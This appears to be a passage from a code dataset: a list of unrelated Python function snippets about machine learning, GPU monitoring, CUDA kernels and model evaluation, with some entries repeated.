sorted(zip(b_s,ifs))]\n elif parallel == False:\n\t ips = np.zeros(bs.size)\n\t ifs = np.zeros(bs.size)\n\t for bi in range(bs.size):\n\t\t candidates = []\n\t\t for r in range(restarts):\n\t\t\t # initialize distribution for bottleneck variable\n\t\t\t pm = np.random.rand(pm_size)+1\n\t\t\t pm /= pm.sum()\n\t\t\t pym_c = np.random.rand(py.size,pm.size)+1 # Starting point for the algorithm\n\t\t\t pym_c /= pym_c.sum(axis=0)\n\t\t\t\t# iterate the BA algorithm\n\t\t\t for i in range(iterations):\n\t\t\t\t pmx_c, z = p_mx_c(pm,px,py,pyx_c,pym_c,bs[bi])\n\t\t\t\t pm = p_m(pmx_c,px)\n\t\t\t\t pym_c = p_ym_c(pm,px,py,pyx_c,pmx_c)\n\t\t\t\t if i>0 and np.allclose(pmx_c,pmx_c_old,rtol=1e-3,atol=1e-3):\n\t\t\t\t\t\t# if the x->m mapping is not updating any more, we're at convergence and we can stop\n\t\t\t\t\t break\n\t\t\t\t pmx_c_old = pmx_c\n\t\t\t candidates.append({'past_info' : mi_x1x2_c(pm, px, pmx_c),\n\t\t\t\t\t\t\t\t 'future_info' : mi_x1x2_c(py, pm, pym_c),\n\t\t\t\t\t\t\t\t 'functional' : -np.log2(np.inner(z,px))})\n\t\t\t# among the restarts, select the result that gives the minimum\n\t\t\t# value for the functional we're actually minimizing (eq 29 in\n\t\t\t# Tishby et al 2000).\n\t\t selected_candidate = min(candidates, key=lambda c: c['functional'])\n\t\t ips[bi] = selected_candidate['past_info']\n\t\t ifs[bi] = selected_candidate['future_info']\n # restrict the returned values to those that, at each value of\n # beta, actually increase (for Ipast) and do not decrease (for\n # Ifuture) the information with respect to the previous value of\n # beta. This is to avoid confounds from cases where the AB\n # algorithm gets stuck in a local minimum.\n ub, bs = compute_upper_bound(ips, ifs, bs)\n ips = np.squeeze(ub[:,0])\n ifs = np.squeeze(ub[:,1])\n return ips, ifs, bs", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def findCodeRateAndPhaseGPU(self):\n\n # Abs**2 sum all Masks \n self.GPU_sumXCorrBuffMasks.prepared_call(self.grid_codeXCorrSum,self.block_codeXCorrSum,\n self.GPU_bufCodeAndPhase,self.GPU_bufXcorr,np.int32(self.Nfft))\n\n # fft real to complex in-place output is Nfft/2*complex64 input is Nfft*float32\n cufft.cufftExecR2C(self.fftPlan_codeRate_R2C,int(self.GPU_bufCodeAndPhase),int(self.GPU_bufCodeAndPhaseOut))\n\n # find the code rate from the magnitude and phase from the argument\n\n self.GPU_findCodeRateAndPhase.prepared_call(self.grid_codeMax, self.block_codeMax,\n self.GPU_bufCodeAndPhaseResult,self.GPU_bufCodeAndPhaseOut,np.int32(self.codeRateAndPhaseOffsetHigh),np.int32(self.codeRateAndPhaseOffsetLow-self.codeRateAndPhaseOffsetHigh))\n\n if log.level == logging.DEBUG:\n log.debug(f'Code rate index: low {self.codeRateAndPhaseOffsetLow}\\t high {self.codeRateAndPhaseOffsetHigh}')\n cuda.memcpy_dtoh(self.__CodeRateAndPhaseResult,self.GPU_bufCodeAndPhaseResult)\n\n\n try:\n # compute symbol rate\n spSym = self.Nfft/self.__CodeRateAndPhaseResult[0]\n\n except:\n log.error(self.__CodeRateAndPhaseResult)\n log.error('Code rate result 0 
should not happen but happened -- fixing it to 10')\n spSym = 10\n \n \n try:\n # compute codeOffset\n codeOffset = -self.__CodeRateAndPhaseResult[1]/np.pi*spSym/2 #\n if codeOffset < 0: # wrap negative values\n codeOffset += spSym - 1\n except:\n log.warning('Error while computing code offset: codeOffset from GPU {}, index {}, max val {}'.format(self.__CodeRateAndPhaseResult[1],self.__CodeRateAndPhaseResult[0],self.__CodeRateAndPhaseResult[2]))\n codeOffset = 0\n\n return spSym, codeOffset", "def conv_bn_relu_forward(x, w, b, gamma, beta, conv_param, bn_param):\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n an, sbn_cache = spatial_batchnorm_forward(a, gamma, beta, bn_param)\n out, relu_cache = relu_forward(an)\n cache = (conv_cache, sbn_cache, relu_cache)\n return out, cache", "def collect_via_pynvml(self, stats_config):\n try:\n NVML_TEMPERATURE_GPU = 0\n pynvml.nvmlInit()\n device_count = pynvml.nvmlDeviceGetCount()\n\n for device_index in xrange(device_count):\n handle = pynvml.nvmlDeviceGetHandleByIndex(device_index)\n memoryInfo = pynvml.nvmlDeviceGetMemoryInfo(handle)\n utilizationRates = pynvml.nvmlDeviceGetUtilizationRates(handle)\n\n metrics = {\n 'memory.total': memoryInfo.total / 1024 / 1024,\n 'memory.used': memoryInfo.total / 1024 / 1024,\n 'memory.free': memoryInfo.free / 1024 / 1024,\n 'utilization.gpu': utilizationRates.gpu,\n 'utilization.memory': utilizationRates.memory,\n 'temperature.gpu':\n pynvml.nvmlDeviceGetTemperature(handle,\n NVML_TEMPERATURE_GPU)\n }\n\n for stat_name in stats_config[1:]:\n metric = metrics.get(stat_name)\n if metric:\n metric_name = 'gpu_{index}.{stat_name}'.format(\n index=str(device_index),\n stat_name=stat_name\n )\n self.publish(metric_name, metric)\n finally:\n pynvml.nvmlShutdown()", "def bn_update(loader, model):\n if not check_bn(model):\n return\n model.train()\n momenta = {}\n model.apply(reset_bn)\n model.apply(lambda module: _get_momenta(module, momenta))\n n = 0\n for input, _ in loader:\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n b = input_var.data.size(0)\n\n momentum = b / (n + b)\n for module in momenta.keys():\n module.momentum = momentum\n\n model(input_var)\n n += b\n\n model.apply(lambda module: _set_momenta(module, momenta))", "def get_distribution(self):\n self.calc()\n proc_blocks = self.proc_blocks\n proc_num_particles = self.particle_loads\n cell_proc = LoadBalancer.get_block_proc(proc_blocks=proc_blocks)\n return cell_proc, proc_num_particles", "def _check_PSNR(self, dataset, is_test=False):\n\n # process one image per iter for test phase\n if is_test:\n batch_size = 1\n else:\n batch_size = 1 # self.batch_size\n\n dataloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=1)\n\n avr_psnr = 0\n avr_ssim = 0\n\n # book keeping variables for test phase\n psnrs = [] # psnr for each image\n ssims = [] # ssim for each image\n proc_time = [] # processing time\n outputs = [] # output for each image\n names = []\n\n for batch, sample in enumerate(dataloader):\n input_batch, label_batch, name = sample['lr'], sample['hr'], sample['im_name']\n\n # Wrap with torch Variable\n input_batch, label_batch = self._wrap_variable(input_batch,\n label_batch,\n self.use_gpu)\n\n if is_test:\n start = time.time()\n if self.model_name in ['TDAN']:\n output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = chop_forward(input_batch, self.model, 4)\n #output_batch = forward_x8(input_batch, self.model).unsqueeze(0)\n #print(output_batch.size())\n # _, lrs = 
self.model(input_batch)\n # output_batch = lrs[:, -1, :, :, :]\n else:\n output_batch = self.model(input_batch)\n elapsed_time = time.time() - start\n else:\n if self.model_name in ['TDAN']:\n #output_batch, _ = self.model(input_batch)\n output_batch = chop_forward(input_batch, self.model, 4)\n else:\n output_batch = self.model(input_batch)\n # ssim is calculated with the normalize (range [0, 1]) image\n ssim = pytorch_ssim.ssim(output_batch + 0.5, label_batch + 0.5, size_average=False)\n ssim = torch.sum(ssim.data)\n avr_ssim += ssim\n\n # calculate PSRN\n output = output_batch.data\n label = label_batch.data\n\n output = (output + 0.5) * 255\n label = (label + 0.5) * 255\n\n output = quantize(output, 255)\n label = quantize(label, 255)\n # diff = input - target\n\n output = output.squeeze(dim=0)\n label = label.squeeze(dim=0)\n\n psnr = self._comput_PSNR(output / 255.0, label / 255.0)\n # print(psnr)\n avr_psnr += psnr\n\n # save psnrs and outputs for statistics and generate image at test time\n if is_test:\n psnrs.append(psnr)\n ssims.append(ssim)\n proc_time.append(elapsed_time)\n np_output = output.cpu().numpy()\n outputs.append(np_output)\n names.append(name)\n\n epoch_size = len(dataset)\n avr_psnr /= epoch_size\n avr_ssim /= epoch_size\n stats = (psnrs, ssims, proc_time)\n\n return avr_psnr, avr_ssim, stats, outputs, names", "def fast_rcnn_detection(self):\n\n\n # (batch_size, num_proposal, 7, 7, channels)\n pooled_feature = self.get_rois(self.rpn_proposals_boxes)\n fast_rcnn_predict_boxes, fast_rcnn_predict_scores = self.fast_rcnn_net(pooled_feature, False)\n\n with tf.variable_scope(\"fast_rcnn_detection\"):\n\n fast_rcnn_softmax_scores = slim.softmax(fast_rcnn_predict_scores) # [-1, num_classes]\n\n # gain the highest category and score and bounding box\n fast_rcnn_categories = tf.argmax(fast_rcnn_softmax_scores, axis=2, output_type=tf.int32) # (N,)\n row_index = tf.range(0, tf.shape(fast_rcnn_categories)[1])\n row_index = tf.expand_dims(row_index, 0)\n multi_row_index = tf.tile(row_index, [self.config.PER_GPU_IMAGE, 1])\n multi_row_index = tf.expand_dims(multi_row_index, axis=-1)\n expand_fast_rcnn_categories = tf.expand_dims(fast_rcnn_categories, axis=-1)\n index = tf.concat([multi_row_index, expand_fast_rcnn_categories], axis=-1)\n fast_rcnn_categories_bboxs = boxes_utils.batch_slice([fast_rcnn_predict_boxes, index],\n lambda x, y: tf.gather_nd(x, y),\n self.config.PER_GPU_IMAGE)\n\n fast_rcnn_categories_scores = tf.reduce_max(fast_rcnn_softmax_scores, axis=2, keepdims=False)# (N,)\n\n detections = self.fast_rcnn_proposals(self.rpn_proposals_boxes,\n fast_rcnn_categories_bboxs,\n fast_rcnn_categories,\n fast_rcnn_categories_scores,\n self.window)\n\n return detections", "def _compute(self, global_step, params, batch_loss):\n individual_losses = get_individual_losses(global_step)\n individual_gradients = autograd_individual_gradients(\n individual_losses, params, concat=True\n )\n hist, edges = self._compute_histogram(individual_gradients)\n\n return {\"hist\": hist.float(), \"edges\": edges}", "def precompute_scoring():\n global volume_void_inclusion\n global attract_point_distances\n global perlin_values\n \n volume_void_inclusion = []\n for i,void in enumerate(volumes_void):\n inclusion = gh.PointInBrep(void,points_input,False)\n volume_void_inclusion.append(inclusion)\n \n attract_point_distances = []\n for i,point in enumerate(points_attractor):\n distances = gh.Division(gh.Distance(point,points_input),max_dist)\n attract_point_distances.append(distances)", "def 
_shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n num_gpus=1,\n model='resnet50',\n num_warmup_batches=5,\n num_batches=50,\n distortions=False,\n forward_only=True,\n device='cpu',\n data_format='NHWC',\n num_intra_threads=0)", "def __init__process(self, n_cpu):\n global shared_slices\n global shared_data\n\n shared_slices_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_slices = np.frombuffer(shared_slices_base)\n shared_slices = shared_slices.reshape((len(self._q.R), -1))\n\n shared_grad_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_grad = np.frombuffer(shared_grad_base)\n shared_grad = shared_grad.reshape((len(self._q.R), -1))\n\n shared_data_base = mp.Array(ctypes.c_double,\n self._data.size,\n lock=False)\n shared_data = np.ctypeslib.as_array(shared_data_base)\n shared_data = shared_data.reshape(self._data.shape)\n shared_data[:] = self._data\n\n self._pool = mp.Pool(n_cpu)", "def main():\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True # pylint: disable=E1101\n\n comm = MPI.COMM_WORLD\n\n # Use MPI for parallel evaluation\n rank = comm.Get_rank()\n size = comm.Get_size()\n\n env_fns, env_names = create_eval_envs()\n\n env = AllowBacktracking(env_fns[rank](stack=False, scale_rew=False))\n env = BatchedFrameStack(BatchedGymEnv([[env]]), num_images=4, concat=False)\n with tf.Session(config=config) as sess:\n dqn = DQN(*rainbow_models(sess,\n env.action_space.n,\n gym_space_vectorizer(env.observation_space),\n min_val=-200,\n max_val=200))\n player = NStepPlayer(BatchedPlayer(env, dqn.online_net), 3)\n optimize = dqn.optimize(learning_rate=1e-4)\n sess.run(tf.global_variables_initializer())\n\n reward_hist = []\n total_steps = 0\n def _handle_ep(steps, rew, env_rewards):\n nonlocal total_steps\n total_steps += steps\n reward_hist.append(rew)\n if total_steps % 1 == 0:\n avg_score = sum(reward_hist[-100:]) / len(reward_hist[-100:])\n\n\t\t\t# Global Score\n global_score = np.zeros(1)\n local_score = np.array(avg_score)\n print(\"Local Score for \" + env_names[rank] + \" at episode \" + str(len(reward_hist)) + \" with timesteps: \" + str(total_steps) + \": \" + str(local_score))\n comm.Allreduce(local_score, global_score, op=MPI.SUM)\n global_score /= size\n if rank == 0:\n print(\"Global Average Score at episode: \" + str(len(reward_hist)) + \": \" + str(global_score))\n\n\n dqn.train(num_steps=2000000, # Make sure an exception arrives before we stop.\n player=player,\n replay_buffer=PrioritizedReplayBuffer(500000, 0.5, 0.4, epsilon=0.1),\n optimize_op=optimize,\n train_interval=1,\n target_interval=8192,\n batch_size=32,\n min_buffer_size=20000,\n handle_ep=_handle_ep,\n save_interval=None,\n restore_path='./checkpoints_rainbow/model-10' # Model to be evaluated\n )", "def collect_via_nvidia_smi(self, stats_config):\n raw_output = self.run_command([\n '--query-gpu={query_gpu}'.format(query_gpu=','.join(stats_config)),\n '--format=csv,nounits,noheader'\n ])\n\n if raw_output is None:\n return\n\n results = raw_output[0].strip().split(\"\\n\")\n for result in results:\n stats = result.strip().split(',')\n assert len(stats) == len(stats_config)\n index = stats[0]\n for stat_name, metric in izip(stats_config[1:], stats[1:]):\n metric_name = 'gpu_{index}.{stat_name}'.format(\n index=str(index),\n stat_name=stat_name\n )\n self.publish(metric_name, metric)", "def calc_contributions(self):\n\n if self.iterations >= self.statistics_batch_num:\n return\n for wrapper in 
self.get_modules_wrapper():\n filters = wrapper.module.weight.size(0)\n contribution = (wrapper.module.weight*wrapper.module.weight.grad).data.pow(2).view(filters, -1).sum(dim=1)\n if wrapper.contribution is None:\n wrapper.contribution = contribution\n else:\n wrapper.contribution += contribution\n\n self.iterations += 1", "def multi_gpu_generate_rpn_on_dataset(\n args, dataset_name, proposal_file, num_images, output_dir):\n # Retrieve the test_net binary path\n binary_dir = envu.get_runtime_dir()\n binary_ext = envu.get_py_bin_ext()\n #TODO note that code can only be run from root_dir!!\n binary = os.path.join(binary_dir, 'tools/test_net' + binary_ext)\n assert os.path.exists(binary), 'Binary \\'{}\\' not found'.format(binary)\n\n # Pass the target dataset via the command line\n opts = ['TEST.DATASETS', '(\"{}\",)'.format(dataset_name)]\n\n # Run inference in parallel in subprocesses\n outputs = subprocess_utils.process_in_parallel(\n 'rpn_proposals', num_images, binary, output_dir,\n args.load_ckpt, args.load_detectron, opts\n )\n\n # Collate the results from each subprocess\n boxes, scores, ids = [], [], []\n for rpn_data in outputs:\n boxes += rpn_data['boxes']\n scores += rpn_data['scores']\n ids += rpn_data['ids']\n rpn_file = os.path.join(output_dir, 'rpn_proposals.pkl')\n cfg_yaml = yaml.dump(cfg)\n save_object(\n dict(boxes=boxes, scores=scores, ids=ids, cfg=cfg_yaml), rpn_file\n )\n logger.info('Wrote RPN proposals to {}'.format(os.path.abspath(rpn_file)))\n return boxes, scores, ids, rpn_file", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def __call__(self, epoch, update):\n count = 0\n ii = 1\n\n gradients_list = []\n metrics_list = []\n from_list 
= []\n step_list = []\n global_update_list = []\n\n while True:\n i,p = next(self.gen)\n if p.poll():\n count += 1\n grads =[]\n for i,fs in enumerate(self.float_sizes):\n w = p.recv_bytes(fs*4)\n grads.append(np.ndarray(self.shapes[i],np.float32, w))\n\n last_update, step, agnt_nr, metrics = p.recv() #only marginal gains her in the e-05s not worth the complexity to doing it with recv_bytes\n\n gradients_list.append(grads)\n metrics_list.append(metrics)\n from_list.append(agnt_nr)\n global_update_list.append(last_update)\n step_list.append(1)\n else:\n ii += 1\n if ii %self.learners == 0:\n time.sleep(0.0001)\n\n if self.warm_start and self.epochs >= epoch:\n if count == self.learners:\n return gradients_list, from_list, global_update_list ,step_list, metrics_list, 0, 2\n else:\n if count == self.num:\n return gradients_list, from_list, global_update_list,step_list, metrics_list, 0, 2", "def _get_fprop_lrn(clss, compute_capability):\n code = r\"\"\"\n%(common)s\n\n__global__ void spool_fprop_lrn(\n const %(type)s* I, %(type)s* O, %(type)s* A,\n float alpha, float beta, float ascale, float bpower, int flags,\n int N, int W, int H, int D, int C,\n int WN, int HWN, int DHWN, int P, int Q,\n int magic_P, int shift_P, int QN, int PQN, int MPQN,\n int pad_c, int pad_d, int pad_h, int pad_w,\n int str_c, int str_d, int str_h, int str_w,\n int S, int RS, int RST, int JRST,\n int magic_S, int shift_S,\n int magic_RS, int shift_RS, int magic_RST, int shift_RST,\n int supP, int supQ, int shlP, int maskP, int shrP,\n int shlQ, int maskQ, int shrQ, int maskN, int shrN\n %(stats_args)s\n )\n{\n __shared__ float rcpWindowSize;\n extern __shared__ int lut[];\n\n int tid = threadIdx.x;\n\n // paralellism is over QMPK dimensions (output pixels and ofm's)\n int n = tid;\n int q = blockIdx.x;\n int mp = blockIdx.y;\n int k = blockIdx.z;\n\n int m = mp * magic_P; m >>= shift_P;\n int p = mp - m*P;\n\n // zigzag q back and forth to improve L2 cache perf\n if (p & 1)\n q = Q - q - 1;\n\n const %(type)s* IonO = I; // input pixel at output location\n I += n;\n IonO += k*MPQN + m*PQN + p*QN + q*N + n;\n O += k*MPQN + m*PQN + p*QN + q*N + n;\n A += k*MPQN + m*PQN + p*QN + q*N + n;\n\n float O_val = beta != 0.0f ? %(cvt)s(__ldg(O)) : 0.0f;\n\n if (tid < 32)\n {\n int kj = k * str_c - pad_c;\n int mt = m * str_d - pad_d;\n int pr = p * str_h - pad_h;\n int qs = q * str_w - pad_w;\n\n int window_size = 0;\n int jrst = tid;\n // this loop generates the LUT (same for pooling and normalization)\n while (jrst < JRST)\n {\n int j = jrst * magic_RST; j >>= shift_RST;\n int rst = jrst - j * RST;\n\n int t = rst * magic_RS; t >>= shift_RS;\n int rs = rst - t * RS;\n\n int r = rs * magic_S; r >>= shift_S;\n int s = rs - r*S;\n\n int x = qs + s;\n int y = pr + r;\n int z = mt + t;\n int c = kj + j;\n\n bool bounds_x = x >= 0 && x < W;\n bool bounds_y = y >= 0 && y < H;\n bool bounds_z = z >= 0 && z < D;\n bool bounds_c = c >= 0 && c < C;\n bool in_bounds = bounds_x && bounds_y && bounds_z && bounds_c;\n\n // Count the total valid slices\n window_size += __popc(__ballot(in_bounds));\n\n int sliceI = c*DHWN + z*HWN + y*WN + x*N;\n\n lut[jrst] = in_bounds ? 
sliceI : -1;\n jrst += 32;\n }\n\n if(tid == 0)\n {\n //rcpWindowSize = 1.0f / (float)window_size;\n rcpWindowSize = (float)RST/(float)JRST;\n }\n }\n __syncthreads();\n\n float out = 0.0f;\n float denom;\n float sumsquare = 0.0f;\n float input = 0.0f;\n int jrst = 0;\n while (jrst < JRST)\n {\n int slice0 = lut[jrst + 0];\n int slice1 = lut[jrst + 1];\n int slice2 = lut[jrst + 2];\n int slice3 = lut[jrst + 3];\n\n // TODO: May not need to load all slices if they are not used.\n input = jrst + 0 < JRST && slice0 >= 0 ? %(cvt)s(__ldg(I + slice0)) : 0.0f;\n sumsquare += jrst + 0 < JRST && slice0 >= 0 ? input * input: 0.0f;\n input = jrst + 1 < JRST && slice1 >= 0 ? %(cvt)s(__ldg(I + slice1)) : 0.0f;\n sumsquare += jrst + 1 < JRST && slice1 >= 0 ? input * input: 0.0f;\n input = jrst + 2 < JRST && slice2 >= 0 ? %(cvt)s(__ldg(I + slice2)) : 0.0f;\n sumsquare += jrst + 2 < JRST && slice2 >= 0 ? input * input: 0.0f;\n input = jrst + 3 < JRST && slice3 >= 0 ? %(cvt)s(__ldg(I + slice3)) : 0.0f;\n sumsquare += jrst + 3 < JRST && slice3 >= 0 ? input * input: 0.0f;\n\n jrst += 4;\n }\n\n denom = (1 + ascale*sumsquare*rcpWindowSize);\n out = %(cvt)s(__ldg(IonO)) / powf(denom, bpower);\n\n\n // convert back to fp to write out\n %(type)s temp_out = %(cvt_out)s( %(mul_by_scale)s (out*alpha + O_val*beta));\n\n // predicate write with no-op flag\n if (!(flags & 1)) {\n *O = temp_out;\n *A = %(cvt_out)s( %(mul_by_scale)s denom ); // write the denomiantor to address\n }\n\n // collect max abs stats\n int intermediate_max = max_abs(0, temp_out); // compute abs\n %(atomic_max)s\n}\n\"\"\"\n\n template_vals = prepare_template_vals(clss, compute_capability)\n code = code % template_vals\n module = SourceModule(code)\n kernel = module.get_function(\"spool_fprop_lrn\")\n kernel.prepare(\"3P 4f 34I 10I\" + flex_sig(clss[0])) # add superblocking parameter\n return kernel", "def _compute_outputs(self, *args, **kwargs):\n pass\n # self.outputs = self.model(input_ids=self.input_ids, masked_lm_labels=self.input_ids)\n # self.logits = self.outputs[0][0]\n # self.probs = torch.softmax(self.logits, 1)", "def run_bp(self, niter):\n for v in self.vs.values():\n v.init_received()\n for f in self.fs:\n f.init_received()\n marg = {v: self.get_marginal(v) for v in self.vs}\n for it in range(niter):\n for v in self.vs.values():\n v.send()\n for f in self.fs:\n f.send()\n for v in self.vs:\n marg[v] = np.vstack((marg[v], self.get_marginal(v)))\n domains = {v.name: v.orig_domain for v in self.vs.values()}\n return (marg, domains, self.vobs)", "def _compute(self, global_step, params, batch_loss):\n individual_losses = get_individual_losses(global_step)\n individual_gradients = autograd_individual_gradients(individual_losses, params)\n layerwise = [\n self._compute_histogram(p, igrad)\n for p, igrad in zip(params, individual_gradients)\n ]\n\n hist = sum(out[0] for out in layerwise)\n edges = layerwise[0][1]\n\n result = {\"hist\": hist, \"edges\": edges}\n\n if self._keep_individual:\n result[\"param_groups\"] = len(params)\n\n for idx, (hist, edges) in enumerate(layerwise):\n result[f\"param_{idx}\"] = {\"hist\": hist, \"edges\": edges}\n\n return result", "def update_probs(self, measure, p, enemy_net = False):\n tmp_net = []\n net_size = len(self.net) \n if not enemy_net:\n net = self.net\n else:\n net = self.enemy_net\n #Maps a given color to its corresponding column in the color's \n #probability table.\n if measure == GREEN:\n color = 0\n elif measure == YELLOW:\n color = 1\n elif measure == ORANGE:\n color = 2\n elif measure == 
RED:\n color = 3\n #Obtains new probabilities by using the distance between the\n #observed position (the one measured) and any other position.\n for j in range(0, net_size):\n distance = self.__get_distance(p, j)\n if distance == 0: #When updating the measured position's probability.\n tmp_net.append(net[j].value * self.ct[0][color])\n elif distance == 1: #When updating an adjacent position to the one measured.\n tmp_net.append(net[j].value * self.ct[1][color])\n elif distance == 2: #When updating a position at two cells from the one measured.\n tmp_net.append(net[j].value * self.ct[2][color])\n elif distance == 3: #When updating a position at three cells from the one measured.\n tmp_net.append(net[j].value * self.ct[3][color])\n else: #When updating a position at four or more cells from the one measured.\n tmp_net.append(net[j].value * self.ct[4][color])\n #Obtains summation of new probabilities in order to execute \n #a posterior normalization.\n total = sum(tmp_net)\n #Normalizes new probabilities and assigns them to its \n #corresponding position.\n for i in range(0, net_size):\n net[i].value = tmp_net[i]/total", "def update_concentrations_batch(self): \n #--- Update the cell concentrations ---\n # dX_i/dt = mu_i*(1-rmp/100)*X_i*(1 - sum(i,(1-rmp/100)X(i))/carrying_capacity) or \n # (X_i(t+dt) - X_i(t))/dt = mu*(1-rmp/100)*X_i(t)*(1 - sum(i,(1-rmp/100)*X_i(t))/carrying_capacity)\n # where rmp is the random mortality percentage\n # If concentration is negative set it to zero\n members_gDW_per_ml_total = sum([(1 - self.random_mortality_percentage/100)*member.organism.gDW_per_ml[self._t] for member in self.community_members])\n self._logisticG_factor_gDW_per_ml = 1 - members_gDW_per_ml_total/self.carrying_capacity['gDW_per_ml']\n if len([member for member in self.community_members if member.organism.cells_per_ml != None]) == len(self.community_members):\n members_cells_per_ml_total = sum([(1 - self.random_mortality_percentage/100)*member.organism.cells_per_ml[self._t] for member in self.community_members])\n self._logisticG_factor_cells_per_ml = 1 - members_cells_per_ml_total/self.carrying_capacity['cells_per_ml']\n\n for member in self.community_members:\n # We always need gDW_per_ml to update compound concentrations but\n # providing cells_per_ml is optional\n member.organism.gDW_per_ml[self._t + self._dt] = max(member.organism.mu[self._t]*(1-self.random_mortality_percentage/100)*member.organism.gDW_per_ml[self._t]*self._logisticG_factor_gDW_per_ml*self._dt + member.organism.gDW_per_ml[self._t],0)\n\n if member.organism.cells_per_ml is not None:\n member.organism.cells_per_ml[self._t + self._dt] = max(member.organism.mu[self._t]*(1 - self.random_mortality_percentage/100)*member.organism.cells_per_ml[self._t]*self._logisticG_factor_cells_per_ml*self._dt + member.organism.cells_per_ml[self._t],0)\n\n # Total death rate (** newly added for DMMM_mortality **)\n if member.organism.mu[self._t] < 0:\n # In thise case random_mortality_rate has already been incorporated into mu\n # (see DMMM.py)\n member.organism.total_death_rate[self._t] = member.organism.mu[self._t] \n else:\n member.organism.total_death_rate[self._t] = member.organism.random_mortality_rate\n\n\n #--- Update shared compound concentrations ---\n # dC/dt = f where, f = sum(k,v_export_k*X_k) - sum(k,v_uptake_k*X_k) + dead_pool_rate\n # (C(t+dt) - c(t))/dt = sum(k,v_export_k*X_k) - sum(k,v_uptake_k*X_k) + dead_pool \n # where, dead_pool_rate = sum(k,-self.cell_pool_factor*cell_pool_concentration_k*total_death_rate_k*X_k)\n # 
Here, cell_pool_concentration is the concentration of the compound pool \n # per gDW or per cells, which should have already been assigned to each \n # shared compound. The minus sign is because total_death_rate is negative\n # while dead_pool_rate must be non-negative. Here, self.cell_pool_factor is\n # the factor that should be multiplied by concentration of that compound \n # (this is because sometimes we want to explore how the growth is affected if \n # the cell pool is higher than the ones reported experimentally)\n total_cmps_conc = sum([cmp.concentration[self._t] for cmp in self.shared_compounds])\n self._logisticG_factor_cmps = 1 - total_cmps_conc/self.carrying_capacity['compounds_mM']\n self._f = dict([(cmp,None) for cmp in self.shared_compounds])\n\n if not hasattr(self,'cell_pool_factor'):\n self.cell_pool_factor = 1\n\n for shared_cmp in self.shared_compounds:\n dead_pool_rate = -sum([self.cell_pool_factor*shared_cmp.cell_pool_concentration[member.organism.id]*member.organism.total_death_rate[self._t]*1000*member.organism.gDW_per_ml[self._t] for member in self.community_members])\n if dead_pool_rate < 0:\n raise userError('dead_pool_rate is negative')\n\n f = sum([r.flux[self._t]*1000*r.model.organism.gDW_per_ml[self._t] for r in shared_cmp.reactions]) + dead_pool_rate\n self._f[shared_cmp] = f\n\n conc = f*self._logisticG_factor_cmps*self._dt + shared_cmp.concentration[self._t]\n\n if conc >= 0 or (conc < 0 and abs(conc) <= 1e-9):\n conc = max(conc,0)\n\n shared_cmp.concentration[self._t + self._dt] = conc", "def bn_update(loader, model, device):\n if not check_bn(model):\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n print('no bn in model?!')\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>!')\n # return model\n\n model.train()\n momenta = {}\n model.apply(reset_bn)\n model.apply(lambda module: _get_momenta(module, momenta))\n n = 0\n\n model = model.to(device)\n pbar = tqdm(loader, unit=\"samples\", unit_scale=loader.batch_size)\n for sample in pbar:\n inputs, targets, target_lengths = sample['input'].to(device), sample['label'].to(device), sample['label_length'].to(device)\n\n inputs = inputs.to(device)\n b = inputs.size(0)\n\n momentum = b / (n + b)\n for module in momenta.keys():\n module.momentum = momentum\n\n # model(inputs)\n # TODO:\n model(inputs, False, targets, target_lengths, 275, test_dataset.tokenizer)\n n += b\n\n model.apply(lambda module: _set_momenta(module, momenta))\n return model", "def benchmark_ng_xla_batch64_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, batch_size=64, variable_update='parameter_server', xla=True)\n 